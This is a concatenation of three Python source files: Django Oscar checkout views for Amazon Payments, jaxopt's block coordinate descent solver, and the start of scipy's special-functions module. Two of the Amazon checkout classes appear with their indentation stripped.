    template_name = 'amazon_payments/shipping_address.html'
    pre_conditions = ('check_basket_is_not_empty',
                      'check_basket_is_valid',
                      'check_user_email_is_captured',
                      'check_basket_requires_shipping')

    def dispatch(self, *args, **kwargs):
        # Without a valid Amazon session there is nothing to show here.
        if not self.init_amazon_payments():
            messages.error(self.request,
                           _("Please click on the 'Pay with Amazon' button to "
                             "begin the Amazon checkout process."))
            return redirect('basket:summary')
        return super(AmazonShippingAddressView, self).dispatch(
            *args, **kwargs)

    def get_context_data(self, **kwargs):
        kwargs = super(AmazonShippingAddressView, self).get_context_data(
            **kwargs)
        # Amazon widget variables (seller id, client id, agreement id, ...).
        kwargs.update(self.get_amazon_payments_context_vars())
        return kwargs

    def get(self, request, **kwargs):
        ctx = self.get_context_data(**kwargs)
        return self.render_to_response(ctx)

    def post(self, request, *args, **kwargs):
        # Only the shipping address is needed here; payment details are
        # validated on a later step.
        amazon_order_details = self.get_amazon_order_details(
            request, validate_payment_details=False)
        if amazon_order_details:
            # Get shipping address
            amazon_shipping_address = amazon_order_details.Destination\
                .PhysicalDestination
            address_fields = dict(
                first_name=amazon_shipping_address.Name.text,
                line1=amazon_shipping_address.AddressLine1.text,
                line4=amazon_shipping_address.City.text,
                state=amazon_shipping_address.StateOrRegion.text,
                postcode=amazon_shipping_address.PostalCode.text,
                country_id=amazon_shipping_address.CountryCode.text,
            )
            # AddressLine2 is optional in Amazon's address payload.
            if amazon_shipping_address.AddressLine2:
                address_fields["line2"] = amazon_shipping_address.AddressLine2\
                    .text
            self.checkout_session.ship_to_new_address(address_fields)
            return redirect("checkout:amazon-payments-shipping-method")
        # Validation failed (errors already queued): re-render the page.
        ctx = self.get_context_data()
        return self.render_to_response(ctx)
class AmazonShippingMethodView(AmazonCheckoutView, ShippingMethodView):
    """Shipping-method step, re-routed so every redirect stays inside the
    Amazon checkout URLs."""

    def get(self, request, *args, **kwargs):
        # These pre-conditions can't easily be factored out into the normal
        # pre-conditions as they do more than run a test and then raise an
        # exception if it fails.
        # Check that shipping is required at all
        if not request.basket.is_shipping_required():
            # No shipping required - we store a special code to indicate so.
            self.checkout_session.use_shipping_method(
                NoShippingRequired().code)
            return self.get_success_response()
        # Check that shipping address has been completed
        if not self.checkout_session.is_shipping_address_set():
            messages.error(request, _("Please choose a shipping address"))
            return http.HttpResponseRedirect(
                reverse('checkout:amazon-payments-shipping-address'))
        # Save shipping methods as instance var as we need them both here
        # and when setting the context vars.
        self._methods = self.get_available_shipping_methods()
        if len(self._methods) == 0:
            # No shipping methods available for given address
            messages.warning(request, _(
                "Shipping is unavailable for your chosen address - please "
                "choose another"))
            return http.HttpResponseRedirect(
                reverse('checkout:amazon-payments-shipping-address'))
        elif len(self._methods) == 1:
            # Only one shipping method - set this and redirect onto the next
            # step
            self.checkout_session.use_shipping_method(self._methods[0].code)
            return self.get_success_response()
        # Must be more than one available shipping method, we present them to
        # the user to make a choice.
        # (super(ShippingMethodView, ...) skips ShippingMethodView's own
        # get(), which this method replaces, and calls its base class's.)
        return super(ShippingMethodView, self).get(request, *args, **kwargs)

    def post(self, request, *args, **kwargs):
        # Need to check that this code is valid for this user
        method_code = request.POST.get('method_code', None)
        is_valid = False
        for method in self.get_available_shipping_methods():
            if method.code == method_code:
                is_valid = True
        if not is_valid:
            messages.error(request, _("Your submitted shipping method is not"
                                      " permitted"))
            return http.HttpResponseRedirect(
                reverse('checkout:amazon-payments-shipping-method'))
        # Save the code for the chosen shipping method in the session
        # and continue to the next step.
        self.checkout_session.use_shipping_method(method_code)
        return self.get_success_response()

    def get_success_response(self):
        # Next step in the Amazon flow.
        return redirect(reverse('checkout:amazon-payments-payment-method'))
class AmazonPaymentMethodView(AmazonCheckoutView, PaymentMethodView):
    """Payment-method step: always forwards straight to the Amazon
    payment-details page."""

    def get_success_response(self):
        """Redirects to the next step of the Amazon checkout flow."""
        url = reverse('checkout:amazon-payments-payment-details')
        return redirect(url)
class BaseAmazonPaymentDetailsView(AmazonCheckoutView, PaymentDetailsView ):
def dispatch(self, *args, **kwargs):
if not self.init_amazon_payments():
messages.error(self.request,
_("Please click on the 'Pay with Amazon' button to "
"begin the Amazon checkout process."))
return redirect('basket:summary')
return super(BaseAmazonPaymentDetailsView, self).dispatch(
*args, **kwargs)
def set_order_details(self, total, order_id=None):
data = {
"AmazonOrderReferenceId": self.session.order_reference_id,
"OrderReferenceAttributes.OrderTotal.Amount": total,
"OrderReferenceAttributes.OrderTotal.CurrencyCode": (
settings.AMAZON_PAYMENTS_CURRENCY)
}
if order_id:
data[
"OrderReferenceAttributes.SellerOrderAttributes.SellerOrderId"
] = order_id
self.api.do_request("SetOrderReferenceDetails", data,
False, self.save_to_db_callback)
def handle_automatic_payments_agreement(self):
"""
Confirms and validates billing agreement to enable automatic payments.
"""
try:
self.api.do_request(
"ConfirmBillingAgreement",
{"AmazonBillingAgreementId": (
self.session.billing_agreement_id)},
False, self.save_to_db_callback)
except self.api.exception_class, e:
if e.args[0] != "BillingAgreementConstraintsExist":
raise
else:
self.api.do_request(
"ValidateBillingAgreement",
{"AmazonBillingAgreementId": (
self.session.billing_agreement_id)},
False, self.save_to_db_callback)
def handle_payment(self, order_number, total, **kwargs):
self.set_order_details(total.incl_tax, order_number)
auth_attempt = self.session.auth_attempts.create()
auth_ref = "%s-%s" % (auth_attempt.pk,
auth_attempt.created_at.strftime("%s"))
try:
authorization_id, tx = self.api.authorize(
self.session.order_reference_id, auth_ref, total.incl_tax,
settings.AMAZON_PAYMENTS_CURRENCY,
callback=self.save_to_db_callback)
except self.api.exception_class, e:
raise PaymentError(*e.args)
auth_attempt.authorization_id = authorization_id
auth_attempt.transaction = tx
auth_attempt.save()
try:
auth_status, captured_amount = self.api.get_authorization_status(
auth_attempt.authorization_id,
callback=self.save_to_db_callback)
except self.api.exception_class, e:
raise PaymentError(*e.args)
if auth_status.State.text == "Declined":
if auth_status.ReasonCode.text in ["InvalidPaymentMethod",
"AmazonRejected"]:
raise UnableToTakePayment(_(
"The payment was rejected by Amazon. Please update the "
"payment method, or choose another method."))
else:
raise PaymentError(auth_status.State.text,
auth_status.ReasonCode.text)
elif (auth_status.State.text == "Closed" and
auth_status.ReasonCode.text != "MaxCapturesProcessed"):
raise PaymentError(auth_status.State.text,
auth_status.ReasonCode.text)
source_type = SourceType.objects.get_or_create(
name="Amazon Payments")[0]
source = Source(
source_type=source_type,
currency="USD",
amount_allocated=captured_amount,
amount_debited=captured_amount,
reference=auth_attempt.authorization_id)
self.add_payment_source(source)
self.add_payment_event("Purchase", total.incl_tax,
reference=auth_attempt.authorization_id)
def handle_successful_order(self, order):
response = super(BaseAmazonPaymentDetailsView, self)\
.handle_successful_order(order)
if getattr(self.request.basket, "has_subscriptions", False):
# Set up automatic future payments. Should not affect current
# order.
try:
self.handle_automatic_payments_agreement()
except self.api.exception_class, e:
logger.error(
"Unable to set up automatic payments for order %s: %s" % (
order, e))
self.session.order = order
self.session.save()
return response
class AmazonPaymentDetailsView(BaseAmazonPaymentDetailsView):
    """Payment-details and preview steps of the multi-step Amazon checkout."""
    template_name = 'amazon_payments/payment_details.html'
    template_name_preview = 'amazon_payments/preview.html'

    def get_context_data(self, **kwargs):
        # Expose the Amazon widget variables on top of Oscar's normal
        # payment-details context.
        kwargs = super(AmazonPaymentDetailsView, self).get_context_data(
            **kwargs)
        kwargs.update(self.get_amazon_payments_context_vars())
        return kwargs

    def post(self, request, *args, **kwargs):
        # 'place_order' comes from the preview page; anything else is the
        # payment-details form being submitted.
        if request.POST.get('action', '') == 'place_order':
            return self.handle_place_order_submission(request)
        return self.handle_payment_details_submission(request)

    def handle_payment_details_submission(self, request):
        # Check if shipping address and payment method have been selected
        amazon_order_details = self.get_amazon_order_details(self.request)
        if not amazon_order_details:
            return redirect("checkout:amazon-payments-payment-details")
        if not self.session.order_reference_id:
            basket = self.request.basket
            shipping_address = self.get_shipping_address(basket)
            shipping_method = self.get_shipping_method(
                basket, shipping_address)
            total = self.get_order_totals(
                basket, shipping_method=shipping_method)
            try:
                # NOTE(review): the seller order id is the basket id prefixed
                # with "1" -- presumably to namespace basket-derived ids;
                # confirm against the Amazon seller account conventions.
                order_reference_id = self.api.create_order_reference_id(
                    self.session.billing_agreement_id, total.incl_tax,
                    settings.AMAZON_PAYMENTS_CURRENCY,
                    callback=self.save_to_db_callback,
                    order_id="1%s" % basket.id)
            except self.api.exception_class:
                messages.error(self.request, _(
                    "An error occurred when processing your payment. "
                    "Please try again later."))
                return redirect("checkout:amazon-payments-payment-details")
            self.session.order_reference_id = order_reference_id
            self.session.save()
        return redirect("checkout:amazon-payments-preview")

    def handle_place_order_submission(self, request):
        # Re-validate the Amazon order details right before submission.
        amazon_order_details = self.get_amazon_order_details(self.request)
        if not amazon_order_details:
            return redirect("checkout:amazon-payments-preview")
        return super(AmazonPaymentDetailsView, self)\
            .handle_place_order_submission(request)
# VIEWS FOR ONE-STEP CHECKOUT

class AmazonOneStepLoginRedirectView(AmazonLoginRedirectView):
    """'Pay with Amazon' login redirect for the one-step checkout flow."""
    _redirect_url = reverse_lazy('checkout:amazon-payments-onestep')
class AmazonOneStepPaymentDetailsView(
ShippingMethodMixin, BaseAmazonPaymentDetailsView):
template_name = 'amazon_payments/onestep_checkout.html'
pre_conditions = (
'check_basket_is_not_empty',
'check_basket_is_valid',)
def get_default_shipping_method(self, basket):
return Repository().get_default_shipping_method(
user=self.request.user, basket=basket,
request=self.request)
def get(self, request, *args, **kwargs):
if request.basket.is_empty:
messages.error(request, _("You need to add some items to your"
" basket to checkout"))
return redirect('basket:summary')
context = self.get_context_data()
return render_to_response(self.template_name, context)
def handle_payment(self, order_number, total, **kwargs):
if not self.session.order_reference_id:
try:
order_reference_id = self.api.create_order_reference_id(
self.session.billing_agreement_id, total.incl_tax,
settings.AMAZON_PAYMENTS_CURRENCY,
callback=self.save_to_db_callback,
order_id=order_number
)
except self.api.exception_class, e:
raise PaymentError(*e.args)
self.session.order_reference_id = order_reference_id
self.session.save()
# We've already checked for valid shipping address and
# payment details in the post() method
super(AmazonOneStepPaymentDetailsView, self).handle_payment(
order_number, total, **kwargs)
def post(self, request, *args, **kwargs):
if request.basket.is_empty:
msg = _("You need to add some items to your basket to check out.")
elif 'place_order' in request.POST:
try:
amazon_order_details = self.get_amazon_order_details(request)
except AmazonPaymentsAPIError, e:
logger.debug(unicode(e))
if e.args[0] == "InvalidAddressConsentToken":
msg = _("Your session has expired. Please sign in again by"
" clicking on the 'Pay with Amazon' button.")
else:
msg = _("Sorry, there's a problem processing your order "
"via Amazon. Please try again later.")
messages.error(request, msg)
return redirect("basket:summary")
if not amazon_order_details:
return redirect(request.path)
# Get shipping address
amazon_shipping_address = amazon_order_details.Destination\
.PhysicalDestination
shipping_address = ShippingAddress(
first_name=amazon_shipping_address.Name.text,
line1=amazon_shipping_address.AddressLine1.text,
line4=amazon_shipping_address.City.text,
state=amazon_shipping_address.StateOrRegion.text,
postcode=amazon_shipping_address.PostalCode.text,
country=Country.objects.get(
iso_3166_1_a2=amazon_shipping_address.CountryCode.text),
)
if amazon_shipping_address.AddressLine2:
shipping_address.line2 = amazon_shipping_address.AddressLine2\
.text
shipping_method = self.get_current_shipping_method(
request.basket)
order_total = self.get_order_totals(
request.basket,
shipping_method=shipping_method)
if request.basket.is_shipping_required() and \
shipping_address.country.pk not in [country.pk for country in \
shipping_method.countries.all()]:
countries = ", ".join([country.pk for country in \
shipping_method.countries.all()])
message=_("We do not yet ship to countries outside of: {}.".format(
countries))
messages.error(request, _(message))
return redirect('checkout:amazon-payments-onestep')
request.basket.calculate_tax(shipping_address)
submission = self.build_submission(
user=request.user, shipping_method=shipping_method,
order_total=order_total, shipping_address=shipping_address)
if (not request.user.is_authenticated() and
not self.checkout_session.get_guest_email()):
submission['order_kwargs']['guest_email'] = (
amazon_order_details.Buyer.Email.text)
result = self.submit(**submission)
return result
amazon_error_code = request.POST.get("amazon_error_code")
amazon_error_message = request.POST.get("amazon_error_message")
if amazon_error_code in ["BuyerSessionExpired", "BuyerNotAssociated",
"StaleOrderReference"]:
msg = ("Your session has expired. Please sign in again by "
"clicking on the 'Pay with Amazon' button.")
else:
msg = ("Sorry, there's a problem processing your order via Amazon."
" Please try again later.")
if amazon_error_code or amazon_error_message:
logger.debug("Amazon widget error response: %s (code: %s)" % (
amazon_error_code, amazon_error_message))
logger.debug(msg)
messages.error(request, _(msg))
return redirect("basket:summary")
def get_context_data(self, **kwargs):
kwargs = RequestContext(self.request, kwargs)
kwargs['basket'] = self.request.basket
method = self.get_current_shipping_method(self.request.basket)
kwargs['shipping_method'] = method
kwargs['order_total'] = self.get_order_totals(
self.request.basket, method)
kwargs.update(self.get_amazon_payments_context_vars())
return kwargs
def render_preview(self, request, **kwargs):
self.preview = False
ctx = self.get_context_data(**kwargs)
return self.render_to_response(ctx)
def build_submission(self, **kwargs):
"""
Return a dict of data to submitted to pay for, and create an order
"""
basket = kwargs.get('basket', self.request.basket)
shipping_address = kwargs['shipping_address']
shipping_method = kwargs['shipping_method']
if not self.get_shipping_address(basket):
if oscar_version_changed:
raise EnvironmentError("You aren't using the proper version of oscar! Delete the build_submission function.")
logger.warning(
'Expected Oscar version to changed, but it didnt with basket #{}.'.format(
oscar.VERSION
)
)
total = self.get_order_totals(
basket, shipping_method=shipping_method)
submission = {
'user': self.request.user,
'basket': basket,
'shipping_address': shipping_address,
'shipping_method': shipping_method,
'order_total': total,
'order_kwargs': {},
'payment_kwargs': {}}
if not submission['user'].is_authenticated():
email = self.checkout_session.get_guest_email()
submission['order_kwargs']['guest_email'] = email
return submission
class AmazonUpdateTaxesAndShippingView(ShippingMethodMixin, BaseAmazonPaymentDetailsView):
    """AJAX endpoint that recomputes taxes, shipping charge and order
    total for the address currently selected in the Amazon widget.

    Responds with a JSON payload; validation problems are reported with
    HTTP status 428 so the frontend can tell them from transport errors.
    """
    template_name = 'amazon_payments/onestep_checkout.html'
    pre_conditions = (
        'check_basket_is_not_empty',
        'check_basket_is_valid',
    )
    def get_default_shipping_method(self, basket):
        # Delegate to Oscar's shipping repository.
        return Repository().get_default_shipping_method(
            user=self.request.user, basket=basket,
            request=self.request)
    def post(self, request, *args, **kwargs):
        """Fetch the Amazon order details, rebuild the shipping address
        from them, and return updated tax/shipping/total figures."""
        # Default payload; replaced on the success path.
        data = {
            "msg": "",
            "status": "error"
        }
        if request.basket.is_empty:
            data['msg'] = _("You need to add some items to your basket to check out.")
        else:
            try:
                # Only the address is needed here, so skip payment
                # validation.
                amazon_order_details = self.get_amazon_order_details(request, validate_payment_details=False)
            except AmazonPaymentsAPIError, e:
                logger.debug(unicode(e))
                if e.args[0] == "InvalidAddressConsentToken":
                    data['msg'] = _("Your session has expired. Please sign in again by"
                        " clicking on the 'Pay with Amazon' button.")
                else:
                    data['msg'] = _("Sorry, there's a problem processing your order "
                        "via Amazon. Please try again later.")
                return HttpResponse(
                    simplejson.dumps(data),
                    mimetype="application/json",
                    status=428
                )
            if not amazon_order_details:
                # NOTE(review): message has a typo ("There no") — fix upstream.
                data['msg'] = _("There no amazon details")
                return HttpResponse(
                    simplejson.dumps(data),
                    mimetype="application/json",
                    status=428
                )
            # Get shipping address
            amazon_shipping_address = amazon_order_details.Destination\
                .PhysicalDestination
            shipping_address = ShippingAddress(
                first_name=amazon_shipping_address.Name.text,
                line1=amazon_shipping_address.AddressLine1.text,
                line4=amazon_shipping_address.City.text,
                state=amazon_shipping_address.StateOrRegion.text,
                postcode=amazon_shipping_address.PostalCode.text,
                country=Country.objects.get(
                    iso_3166_1_a2=amazon_shipping_address.CountryCode.text),
            )
            # AddressLine2 is optional in the Amazon response.
            if amazon_shipping_address.AddressLine2:
                shipping_address.line2 = amazon_shipping_address.AddressLine2\
                    .text
            shipping_method = self.get_current_shipping_method(request.basket)
            # Reject addresses outside the method's shippable countries.
            if shipping_address.country.pk not in [country.pk for country in \
                    shipping_method.countries.all()]:
                countries = ", ".join([country.pk for country in \
                    shipping_method.countries.all()])
                message=_("We do not yet ship to countries outside of: {}.".format(
                    countries))
                # messages.error(self.request, _(message))
                return HttpResponse(
                    simplejson.dumps({"error": message}),
                    mimetype="application/json",
                    status=428
                )
            # Taxes depend on the destination address.
            request.basket.calculate_tax(
                shipping_address
            )
            shipping = shipping_method.charge_excl_tax
            taxes = request.basket.total_tax
            data = {
                "status": "ok",
                "msg": "success",
                "taxes": "$"+str(taxes),
                "total": "$"+str(request.basket.total_incl_tax + shipping),
                "shipping": "$"+str(shipping),
            }
        return HttpResponse(
            simplejson.dumps(data),
            mimetype="application/json"
        )
| |
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implementation of block coordinate descent in JAX."""
import inspect
from typing import Any
from typing import Callable
from typing import NamedTuple
from typing import Optional
from typing import Union
from dataclasses import dataclass
import jax
import jax.numpy as jnp
from jaxopt._src import base
from jaxopt._src import implicit_diff as idf
from jaxopt._src import loop
from jaxopt._src import objective
from jaxopt._src import tree_util
class BlockCDState(NamedTuple):
  """Named tuple containing state information."""
  # Number of completed epochs (one epoch = one sweep over all blocks).
  iter_num: int
  # sqrt of the accumulated squared block updates of the last epoch — a
  # cheap lower bound on the true optimality error.
  error: float
  # Cached linop.matvec(params), updated incrementally block by block.
  predictions: jnp.ndarray
  # Gradient of the smooth sub-function evaluated at ``predictions``.
  subfun_g: jnp.ndarray
@dataclass(eq=False)
class BlockCoordinateDescent(base.IterativeSolver):
  """Block coordinate solver.
  This solver minimizes::
    objective(params, hyperparams_prox, *args, **kwargs) =
      fun(params, *args, **kwargs) + non_smooth(params, hyperparams_prox)
  Attributes:
    fun: a smooth function of the form ``fun(params, *args, **kwargs)``.
      It should be a ``objective.CompositeLinearFunction`` object.
    block_prox: block-wise proximity operator associated with ``non_smooth``,
      a function of the form ``block_prox(x[j], hyperparams_prox, scaling=1.0)``.
      See ``jaxopt.prox`` for examples.
    maxiter: maximum number of proximal gradient descent iterations.
    tol: tolerance to use.
    verbose: whether to print error on every iteration or not.
      Warning: verbose=True will automatically disable jit.
    implicit_diff: whether to enable implicit diff or autodiff of unrolled
      iterations.
    implicit_diff_solve: the linear system solver to use.
    jit: whether to JIT-compile the optimization loop (default: "auto").
    unroll: whether to unroll the optimization loop (default: "auto").
  """
  fun: objective.CompositeLinearFunction
  block_prox: Callable
  maxiter: int = 500
  tol: float = 1e-4
  verbose: int = 0
  implicit_diff: bool = True
  implicit_diff_solve: Optional[Callable] = None
  jit: base.AutoOrBoolean = "auto"
  unroll: base.AutoOrBoolean = "auto"
  def init_state(self,
                 init_params: Any,
                 hyperparams_prox: Any,
                 *args,
                 **kwargs) -> BlockCDState:
    """Initialize the solver state.
    Args:
      init_params: pytree containing the initial parameters.
      hyperparams_prox: pytree containing hyperparameters of block_prox.
      *args: additional positional arguments to be passed to ``fun``.
      **kwargs: additional keyword arguments to be passed to ``fun``.
    Returns:
      state
    """
    del hyperparams_prox  # Not used.
    linop = self.fun.make_linop(*args, **kwargs)
    # Cache predictions and the sub-function gradient so update() can
    # refresh them incrementally instead of recomputing from scratch.
    predictions = linop.matvec(init_params)
    subfun_g = self._grad_subfun(predictions, *args, **kwargs)
    return BlockCDState(iter_num=jnp.asarray(0),
                        predictions=predictions,
                        subfun_g=subfun_g,
                        error=jnp.asarray(jnp.inf))
  def update(self,
             params: Any,
             state: NamedTuple,
             hyperparams_prox: Any,
             *args,
             **kwargs) -> base.OptStep:
    """Performs one epoch of block CD.
    Args:
      params: pytree containing the parameters.
      state: named tuple containing the solver state.
      hyperparams_prox: pytree containing hyperparameters of block_prox.
      *args: additional positional arguments to be passed to ``fun``.
      **kwargs: additional keyword arguments to be passed to ``fun``.
    Returns:
      (params, state)
    """
    linop = self.fun.make_linop(*args, **kwargs)
    # Per-block step sizes: inverse column-wise Lipschitz constants.
    stepsizes = 1.0 / self.fun.columnwise_lipschitz_const(*args, **kwargs)
    # todo: ability to permute block order.
    def body_fun(i, tup):
      # Must stay pure / jit-compatible: carried state is (params,
      # cached gradient, cached predictions, accumulated sq. error).
      x, subfun_g, predictions, sqerror_sum = tup
      x_i_old = x[i]
      g_i = linop.rmatvec_element(subfun_g, i)
      b = self.fun.b(*args, **kwargs)
      if b is not None:
        g_i += b[i]
      # Proximal gradient step on block i only.
      x_i_new = self.block_prox(x[i] - stepsizes[i] * g_i,
                                hyperparams_prox,
                                stepsizes[i])
      diff_i = x_i_new - x_i_old
      # A cheap-to-compute lower-bound of self.l2_optimality_error.
      sqerror_sum += jnp.sum(diff_i ** 2)
      x = x.at[i].set(x_i_new)
      # Rank-one style refresh of the cached matvec, then the gradient.
      predictions = linop.update_matvec(predictions, diff_i, i)
      subfun_g = self._grad_subfun(predictions, *args, **kwargs)
      return x, subfun_g, predictions, sqerror_sum
    init = (params, state.subfun_g, state.predictions, 0)
    params, subfun_g, predictions, sqerror_sum = jax.lax.fori_loop(
        lower=0, upper=params.shape[0], body_fun=body_fun, init_val=init)
    state = BlockCDState(iter_num=state.iter_num + 1,
                         predictions=predictions,
                         subfun_g=subfun_g,
                         error=jnp.sqrt(sqerror_sum))
    return base.OptStep(params=params, state=state)
  def _fixed_point_fun(self, params, hyperparams_prox, *args, **kwargs):
    # One full (non block-wise) proximal gradient step.
    grad_step = params - self._grad_fun(params, *args, **kwargs)
    return self._prox(grad_step, hyperparams_prox)
  def optimality_fun(self,
                     params: Any,
                     hyperparams_prox: Any,
                     *args,
                     **kwargs) -> Any:
    """Proximal-gradient fixed point residual.
    This function is compatible with ``@custom_root``.
    The fixed point function is defined as::
      fixed_point_fun(params, hyperparams_prox, *args, **kwargs) =
        prox(params - grad(fun)(params, *args, **kwargs), hyperparams_prox)
    where::
      prox = jax.vmap(block_prox, in_axes=(0, None))
    The residual is defined as::
      optimality_fun(params, hyperparams_prox, *args, **kwargs) =
        fixed_point_fun(params, hyperparams_prox, *args, **kwargs) - params
    Args:
      params: pytree containing the parameters.
      hyperparams_prox: pytree containing hyperparameters of block_prox.
      *args: additional positional arguments to be passed to ``fun``.
      **kwargs: additional keyword arguments to be passed to ``fun``.
    Returns:
      residual: pytree with same structure as ``params``.
    """
    fp = self._fixed_point_fun(params, hyperparams_prox, *args, **kwargs)
    return fp - params
  def __post_init__(self):
    if not isinstance(self.fun, objective.CompositeLinearFunction):
      raise AttributeError("fun should be an instance of "
                           "objective.CompositeLinearFunction.")
    # Pre-compile useful functions.
    self._grad_fun = jax.grad(self.fun)
    self._grad_subfun = jax.grad(self.fun.subfun)
    self._prox = jax.vmap(self.block_prox, in_axes=(0, None))
    # Sets up reference signature.
    # Insert hyperparams_prox right after the params argument so the
    # base class can route arguments correctly.
    signature = inspect.signature(self.fun.subfun)
    parameters = list(signature.parameters.values())
    new_param = inspect.Parameter(name="hyperparams_prox",
                                  kind=inspect.Parameter.POSITIONAL_OR_KEYWORD)
    parameters.insert(1, new_param)
    self.reference_signature = inspect.Signature(parameters)
| |
#
# Author: Travis Oliphant, 2002
#
from __future__ import division, print_function, absolute_import
import numpy as np
from scipy.lib.six import xrange
from numpy import pi, asarray, floor, isscalar, iscomplex, real, imag, sqrt, \
where, mgrid, cos, sin, exp, place, seterr, issubdtype, extract, \
less, vectorize, inexact, nan, zeros, sometrue, atleast_1d
from ._ufuncs import ellipkm1, mathieu_a, mathieu_b, iv, jv, gamma, psi, zeta, \
hankel1, hankel2, yv, kv, gammaln, ndtri, errprint
from . import _ufuncs
import types
from . import specfun
from . import orthogonal
import warnings
# Names exported as the public API of this module.
__all__ = ['agm', 'ai_zeros', 'assoc_laguerre', 'bei_zeros', 'beip_zeros',
           'ber_zeros', 'bernoulli', 'berp_zeros', 'bessel_diff_formula',
           'bi_zeros', 'clpmn', 'digamma', 'diric', 'ellipk', 'erf_zeros', 'erfcinv',
           'erfinv', 'errprint', 'euler', 'fresnel_zeros',
           'fresnelc_zeros', 'fresnels_zeros', 'gamma', 'gammaln', 'h1vp',
           'h2vp', 'hankel1', 'hankel2', 'hyp0f1', 'iv', 'ivp', 'jn_zeros',
           'jnjnp_zeros', 'jnp_zeros', 'jnyn_zeros', 'jv', 'jvp', 'kei_zeros',
           'keip_zeros', 'kelvin_zeros', 'ker_zeros', 'kerp_zeros', 'kv',
           'kvp', 'lmbda', 'lpmn', 'lpn', 'lqmn', 'lqn', 'mathieu_a',
           'mathieu_b', 'mathieu_even_coef', 'mathieu_odd_coef', 'ndtri',
           'obl_cv_seq', 'pbdn_seq', 'pbdv_seq', 'pbvv_seq',
           'polygamma', 'pro_cv_seq', 'psi', 'riccati_jn', 'riccati_yn',
           'sinc', 'sph_harm', 'sph_in', 'sph_inkn',
           'sph_jn', 'sph_jnyn', 'sph_kn', 'sph_yn', 'y0_zeros', 'y1_zeros',
           'y1p_zeros', 'yn_zeros', 'ynp_zeros', 'yv', 'yvp', 'zeta',
           'SpecialFunctionWarning']
class SpecialFunctionWarning(Warning):
    """Warning category used by the special-function routines."""
    pass
warnings.simplefilter("always", category=SpecialFunctionWarning)
def sinc(x):
    """Return the normalized sinc function sin(pi*x)/(pi*x), elementwise.

    The removable singularity at x == 0 evaluates to 1.
    """
    x = asarray(x)
    arg = pi * x
    # sin(arg)/arg raises 0/0 warnings at the origin; silence them and
    # patch the result afterwards.
    saved = seterr(all='ignore')
    ratio = sin(arg) / arg
    seterr(**saved)
    return where(x == 0, 1.0, ratio)
def diric(x, n):
    """Return the periodic sinc (Dirichlet) function:

        diric(x) = sin(x * n / 2) / (n * sin(x / 2))

    where n is a positive integer.  Invalid n (non-positive or
    non-integral) yields nan.
    """
    x, n = asarray(x), asarray(n)
    # Broadcast each argument against the other.
    n = asarray(n + (x - x))
    x = asarray(x + (n - n))
    ytype = x.dtype if issubdtype(x.dtype, inexact) else float
    y = zeros(x.shape, ytype)

    # Invalid orders -> nan.
    bad = (n <= 0) | (n != floor(n))
    place(y, bad, nan)

    # At multiples of 2*pi the ratio takes its limit value +/- 1.
    z = asarray(x / 2.0 / pi)
    at_period = (1 - bad) & (z == floor(z))
    place(y, at_period,
          pow(-1, extract(at_period, z) * (extract(at_period, n) - 1)))

    # Everywhere else use the defining formula directly.
    rest = (1 - bad) & (1 - at_period)
    xr = extract(rest, x)
    nr = extract(rest, n)
    place(y, rest, sin(nr * xr / 2.0) / (nr * sin(xr / 2.0)))
    return y
def jnjnp_zeros(nt):
    """Compute nt (<=1200) zeros of the Bessel functions Jn and Jn',
    ordered by magnitude.

    Returns
    -------
    zo[l-1] : ndarray
        Value of the lth zero of Jn(x) or Jn'(x). Of length `nt`.
    n[l-1] : ndarray
        Order of the Jn(x) or Jn'(x) associated with the lth zero.
    m[l-1] : ndarray
        Serial number of the zeros of Jn(x) or Jn'(x) associated with
        the lth zero.
    t[l-1] : ndarray
        0 if the lth zero in zo is a zero of Jn(x), 1 if it is a zero
        of Jn'(x).

    See Also
    --------
    jn_zeros, jnp_zeros : to get separated arrays of zeros.
    """
    if not isscalar(nt) or (floor(nt) != nt) or (nt > 1200):
        raise ValueError("Number must be integer <= 1200.")
    count = int(nt)
    n, m, t, zo = specfun.jdzo(count)
    # zo is indexed from 1 by this slicing (element 0 unused).
    return zo[1:count + 1], n[:count], m[:count], t[:count]
def jnyn_zeros(n, nt):
    """Compute nt zeros of each of Jn(x), Jn'(x), Yn(x) and Yn'(x).

    Returns four arrays of length nt.  See jn_zeros, jnp_zeros,
    yn_zeros, ynp_zeros for the individual arrays.
    """
    if not (isscalar(n) and isscalar(nt)):
        raise ValueError("Arguments must be scalars.")
    if n != floor(n) or nt != floor(nt):
        raise ValueError("Arguments must be integers.")
    if (nt <= 0):
        raise ValueError("nt > 0")
    return specfun.jyzo(abs(n), nt)
def jn_zeros(n, nt):
    """Compute nt zeros of the Bessel function Jn(x)."""
    all_zeros = jnyn_zeros(n, nt)
    return all_zeros[0]
def jnp_zeros(n, nt):
    """Compute nt zeros of the Bessel function derivative Jn'(x)."""
    all_zeros = jnyn_zeros(n, nt)
    return all_zeros[1]
def yn_zeros(n, nt):
    """Compute nt zeros of the Bessel function Yn(x)."""
    all_zeros = jnyn_zeros(n, nt)
    return all_zeros[2]
def ynp_zeros(n, nt):
    """Compute nt zeros of the Bessel function derivative Yn'(x)."""
    all_zeros = jnyn_zeros(n, nt)
    return all_zeros[3]
def y0_zeros(nt, complex=0):
    """Return nt (complex or real) zeros z0 of Y0(z) together with the
    value of Y0'(z0) = -Y1(z0) at each zero.
    """
    if not isscalar(nt) or (floor(nt) != nt) or (nt <= 0):
        raise ValueError("Arguments must be scalar positive integer.")
    # kf=0 selects Y0; kc selects real-only (True) vs complex zeros.
    kf = 0
    kc = (complex != 1)
    return specfun.cyzo(nt, kf, kc)
def y1_zeros(nt, complex=0):
    """Return nt (complex or real) zeros z1 of Y1(z) together with the
    value of Y1'(z1) = Y0(z1) at each zero.
    """
    if not isscalar(nt) or (floor(nt) != nt) or (nt <= 0):
        raise ValueError("Arguments must be scalar positive integer.")
    # kf=1 selects Y1; kc selects real-only (True) vs complex zeros.
    kf = 1
    kc = (complex != 1)
    return specfun.cyzo(nt, kf, kc)
def y1p_zeros(nt, complex=0):
    """Return nt (complex or real) zeros z1' of Y1'(z) together with the
    value of Y1(z1') at each zero.
    """
    if not isscalar(nt) or (floor(nt) != nt) or (nt <= 0):
        raise ValueError("Arguments must be scalar positive integer.")
